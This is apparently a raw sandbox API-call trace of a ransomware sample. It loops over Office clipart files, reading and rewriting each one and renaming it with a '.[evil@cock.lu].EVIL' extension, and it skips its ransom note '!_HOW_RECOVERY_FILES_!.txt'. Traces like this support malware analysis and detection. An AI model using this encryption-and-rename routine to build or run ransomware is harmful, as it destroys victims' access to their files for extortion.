[0130.521] _errno () returned 0x84b1160840 [0130.521] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1860, lpOverlapped=0x0) returned 1 [0130.521] CloseHandle (hObject=0x1a8) returned 1 [0130.521] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.521] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.521] __uncaught_exception () returned 0x84b1160800 [0130.521] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.521] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf.[evil@cock.lu].evil")) returned 1 [0130.536] ??_V@YAXPEAX@Z () returned 0x1 [0130.538] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF", dwFileAttributes=0x200) returned 0 [0130.539] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.539] wcsstr (_Str="J0099175.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.539] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 69 [0130.539] wcscmp (_String1="J0099175.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.539] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099175.WMF") returned 0x0 [0130.539] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF") returned 0x45 [0130.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.541] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2610, lpOverlapped=0x0) returned 1 [0130.548] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.548] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.548] _errno () returned 0x84b1160840 [0130.548] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.548] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2620, lpOverlapped=0x0) returned 1 [0130.548] CloseHandle (hObject=0x1a8) returned 1 [0130.548] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.549] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.549] __uncaught_exception () returned 0x84b1160800 [0130.549] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.549] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf.[evil@cock.lu].evil")) returned 1 [0130.550] ??_V@YAXPEAX@Z () returned 0x1 [0130.552] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF", dwFileAttributes=0x200) returned 0 [0130.553] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.553] wcsstr (_Str="J0099176.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.553] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 69 [0130.553] wcscmp (_String1="J0099176.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.553] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099176.WMF") returned 0x0 [0130.553] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 0x45 [0130.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.555] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9b8, lpOverlapped=0x0) returned 1 [0130.567] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.568] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.568] _errno () returned 0x84b1160840 [0130.568] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.568] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0130.568] CloseHandle (hObject=0x1a8) returned 1 [0130.568] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.568] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.568] __uncaught_exception () returned 0x84b1160800 [0130.568] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.568] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf.[evil@cock.lu].evil")) returned 1 [0130.576] ??_V@YAXPEAX@Z () returned 0x1 [0130.579] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF", dwFileAttributes=0x200) returned 0 [0130.579] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.579] wcsstr (_Str="J0099177.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.579] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 69 [0130.579] wcscmp (_String1="J0099177.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.579] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099177.WMF") returned 0x0 [0130.579] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF") returned 0x45 [0130.579] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.581] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x150a, lpOverlapped=0x0) returned 1 [0130.599] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.599] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.599] _errno () returned 0x84b1160840 [0130.600] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.600] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1520, lpOverlapped=0x0) returned 1 [0130.600] CloseHandle (hObject=0x1a8) returned 1 [0130.600] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.600] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.600] __uncaught_exception () returned 0x84b1160800 [0130.600] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.600] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf.[evil@cock.lu].evil")) returned 1 [0130.601] ??_V@YAXPEAX@Z () returned 0x1 [0130.604] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF", dwFileAttributes=0x200) returned 0 [0130.604] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.604] wcsstr (_Str="J0099178.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.604] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 69 [0130.604] wcscmp (_String1="J0099178.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.604] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099178.WMF") returned 0x0 [0130.604] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 0x45 [0130.604] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.606] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe16, lpOverlapped=0x0) returned 1 [0130.623] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.623] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.623] _errno () returned 0x84b1160840 [0130.623] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.623] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0130.623] CloseHandle (hObject=0x1a8) returned 1 [0130.623] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.624] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.624] __uncaught_exception () returned 0x84b1160800 [0130.624] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.624] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf.[evil@cock.lu].evil")) returned 1 [0130.625] ??_V@YAXPEAX@Z () returned 0x1 [0130.628] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF", dwFileAttributes=0x200) returned 0 [0130.628] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.628] wcsstr (_Str="J0099179.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.628] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 69 [0130.628] wcscmp (_String1="J0099179.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.628] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099179.WMF") returned 0x0 [0130.628] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 0x45 [0130.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.630] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23c2, lpOverlapped=0x0) returned 1 [0130.637] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.637] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.637] _errno () returned 0x84b1160840 [0130.637] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.637] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23e0, lpOverlapped=0x0) returned 1 [0130.638] CloseHandle (hObject=0x1a8) returned 1 [0130.638] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.638] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.638] __uncaught_exception () returned 0x84b1160800 [0130.638] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.638] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf.[evil@cock.lu].evil")) returned 1 [0130.639] ??_V@YAXPEAX@Z () returned 0x1 [0130.642] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF", dwFileAttributes=0x200) returned 0 [0130.642] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.642] wcsstr (_Str="J0099180.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.642] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 69 [0130.642] wcscmp (_String1="J0099180.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.642] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099180.WMF") returned 0x0 [0130.642] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 0x45 [0130.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.644] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd42, lpOverlapped=0x0) returned 1 [0130.663] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.663] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.663] _errno () returned 0x84b1160840 [0130.663] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.663] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd60, lpOverlapped=0x0) returned 1 [0130.664] CloseHandle (hObject=0x1a8) returned 1 [0130.664] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.664] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.664] __uncaught_exception () returned 0x84b1160800 [0130.664] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.664] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf.[evil@cock.lu].evil")) returned 1 [0130.665] ??_V@YAXPEAX@Z () returned 0x1 [0130.668] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF", dwFileAttributes=0x200) returned 0 [0130.668] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.668] wcsstr (_Str="J0099181.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.668] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 69 [0130.668] wcscmp (_String1="J0099181.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.668] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099181.WMF") returned 0x0 [0130.668] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF") returned 0x45 [0130.668] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.670] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ae, lpOverlapped=0x0) returned 1 [0130.689] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.689] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.689] _errno () returned 0x84b1160840 [0130.689] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.689] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c0, lpOverlapped=0x0) returned 1 [0130.689] CloseHandle (hObject=0x1a8) returned 1 [0130.689] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0130.690] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0130.690] __uncaught_exception () returned 0x84b1160800 [0130.690] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0130.690] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099181.wmf.[evil@cock.lu].evil")) returned 1 [0130.691] ??_V@YAXPEAX@Z () returned 0x1 [0130.694] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099181.WMF", dwFileAttributes=0x200) returned 0 [0130.694] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0130.694] wcsstr (_Str="J0099182.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0130.694] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 69 [0130.694] wcscmp (_String1="J0099182.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0130.694] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0099182.WMF") returned 0x0 [0130.694] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 0x45 [0130.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0130.696] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf00, lpOverlapped=0x0) returned 1 [0130.743] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.743] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0130.743] _errno () returned 0x84b1160840 [0130.743] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.744] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf20, lpOverlapped=0x0) returned 1 [0130.744] CloseHandle (hObject=0x1a8) returned 1 [0130.744] _wfsopen (_FileName="C:\\\\Program 